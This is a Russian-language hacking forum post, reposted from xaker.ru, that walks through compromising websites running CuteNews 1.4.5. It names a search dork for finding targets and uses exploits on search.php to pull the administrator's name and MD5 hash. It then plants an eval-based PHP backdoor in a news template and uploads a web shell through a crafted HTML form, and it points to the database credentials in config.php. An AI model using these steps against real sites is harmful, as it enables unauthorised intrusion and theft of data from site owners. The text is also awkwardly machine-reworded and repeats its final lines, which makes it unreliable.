1 [Уязвимость] l2antidonat.com Вт Дек 20, 2011 5:15 pm
Admin
Admin
Заходим в админку 1. Все давно знают то, что поиск в гуглом: © Project -= Moy-weB =-2. Опосля того как погуглили идем на мотивированной веб-сайт и заходим в директорию /news/ ежели есть, то отлично, ежели наконец-то нет гуглим далее. Так же обязателен файл /news/search.php 3. Надо сказать то, что далее используем сплоит для поиска администратора Код:$target = 'http://localhost/cutenews.1.4.5/search.php'; тут указываем путь к файлу search.php.3. Последующим шагом будет внедрение сплоита для поиска MD5 хэша администратора. $target = 'http://localhost/cutenews.1.4.5/search.php'; Путь к файлу search.php$username = 'waraxe'; Ник администратора (получен при помощи первого сплоита).Ежели не желаете применять сплоиты, вы сможете восплользоваться сиим веб-сайтом 4. Расшифровываем хэш. Само-собой разумеется, и идем в админку веб-сайта - /news/ Заливаем шелл 1. Идем в Опции - Редактировать шаблоны - Активные анонсы 2. Лицезреем текстовое поле. Туда пишем: Код:HTML;if(isset($GET['shell'])) eval($GET['shell']);3. Дальше проверяем news/shownews.php?shell=phpinfo(); Обязана показаться информация о PHP. Приступаем к заливке шелла. 4. Создаем файл HTML : Код:<form action=http://site.com/news/shownews.php?shell=copy($FILES[file][tmpname],$GET[aa]);&aa=локальный путь сайта\news\shell.php method=post enctype=multipart/form-data> <input type=file name=file>
<input type=submit value=Загрузить>
</form>5. Радуемся шеллу по адресу - http://site.com/news/shell.php P.S. Данные для подключения к БД находятся в /config/config.phpАвтор MERRON ©.Взято с xaker.ruБуду не против благодарностей.Флудерам здесь не место.
<input type=submit value=Загрузить>
</form>5. Радуемся шеллу по адресу - http://site.com/news/shell.php P.S. Данные для подключения к БД находятся в /config/config.phpАвтор MERRON ©.Взято с xaker.ruБуду не против благодарностей.Флудерам здесь не место.